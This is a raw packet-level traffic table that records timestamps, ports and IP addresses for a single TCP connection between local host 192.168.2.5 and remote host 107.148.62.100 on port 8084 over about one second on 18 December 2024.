Dec 18, 2024 13:32:01.833849907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.833878040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.834661961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.834678888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.834693909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.834721088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.835937977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.835952997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.835983992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.837239027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.837255955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.837269068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.837289095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.837306976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.838547945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.838563919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.838578939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.838618994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.839582920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.839597940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.839612961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.839641094 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.839656115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.840621948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.840637922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.840652943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.840686083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.841475964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.841491938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.841521978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.842370033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.842386007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.842400074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.842415094 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.842453957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.843250990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.890654087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.919807911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.920057058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.920161963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.920592070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.927850008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.927917004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.928133011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.928632975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.928689957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.944708109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.944998026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.945070028 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.945533037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.945950985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.945997953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.946360111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.946800947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.946851015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.959311008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.959824085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:01.959884882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:01.960283995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.008788109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.022711992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.023061991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.023118019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.023467064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.023658991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.023705959 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.024137974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.024672031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.024720907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.025820971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.026355982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.026407003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.028059959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.032007933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.032051086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.032237053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.032494068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.032546043 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.032675982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.033179998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.033230066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.033606052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.035526991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.035576105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.035919905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.036508083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.036557913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.040414095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.040802002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.040852070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.041304111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.041604042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.041644096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.042392969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.042941093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.042984009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.044456959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.044833899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.044878006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.045289993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.046840906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.046886921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.047151089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.047666073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.047724009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.049424887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.049685955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.049731970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.050076962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.051621914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.051673889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.051868916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.052690983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.052746058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.054999113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.055233002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.055282116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.056130886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.101027012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.143605947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.144026995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.144082069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.145772934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.145790100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.145839930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.147917986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.147933960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.147989988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.150659084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.150682926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.150729895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.161840916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.162127018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.162183046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.162662029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.163369894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.163415909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.163701057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.164298058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.164352894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.178586006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.223498106 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.328854084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.328915119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.328983068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.329984903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330003023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330019951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330035925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330049992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330051899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330069065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330081940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330085993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330102921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330118895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330133915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330167055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330169916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330188036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330204010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330214024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330223083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330240011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330246925 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330256939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330271959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330286980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330290079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330306053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330317974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330322981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330338001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330354929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330363035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330369949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330383062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330387115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330403090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330410957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330420017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330435991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330451965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330452919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330478907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330549002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330565929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330595970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330617905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330661058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330694914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330710888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330750942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.330760002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330792904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330810070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.330832005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.374738932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.540559053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.540575027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.540739059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.541835070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.541848898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.541903019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.543226957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.543241024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.543301105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.544832945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.544846058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.544857979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.544949055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.546391964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.546406984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.546458960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.547867060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.547882080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.547934055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.549256086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.549271107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.549315929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.550760984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.550781012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.550795078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.550815105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.550848007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.552371979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.552392006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.552450895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.553976059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.553992987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.554044962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.555350065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.555370092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.555419922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.557313919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.557331085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.557379961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.558718920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.558754921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.558770895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.558799982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.560519934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.560540915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.560575962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.562187910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.562225103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.562246084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.564193964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.564215899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.564248085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.565598965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.565614939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.565628052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.565659046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.565681934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.567202091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.567219973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.567270041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.568407059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.568439007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.568485022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.569881916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.569897890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.569948912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.571150064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.571170092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.571185112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.571222067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.581929922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.581943035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.581995964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.587527037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.587588072 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.591368914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.591391087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.591449976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.619622946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.619658947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.619716883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.660470009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.660484076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.660583973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.663439989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.663454056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.663464069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.663516045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.666466951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.666480064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.666532993 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.685046911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.685158014 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.688169956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.688184977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.688251972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.690686941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.690696955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.690754890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.693766117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.693778992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.693788052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.693850040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.696729898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.696749926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.696760893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.696774960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.696784973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.696810007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.699666023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.699712992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.699762106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.699855089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.702353001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.702374935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.702389956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.702404976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.702449083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.702476025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.712726116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.712745905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.712800026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.715003967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.715033054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.715049028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.715074062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.718211889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.718245983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.718282938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.721257925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.721290112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.721316099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:02.755537033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.755554914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:02.755640030 CET	49705	8084	192.168.2.5	107.148.62.100
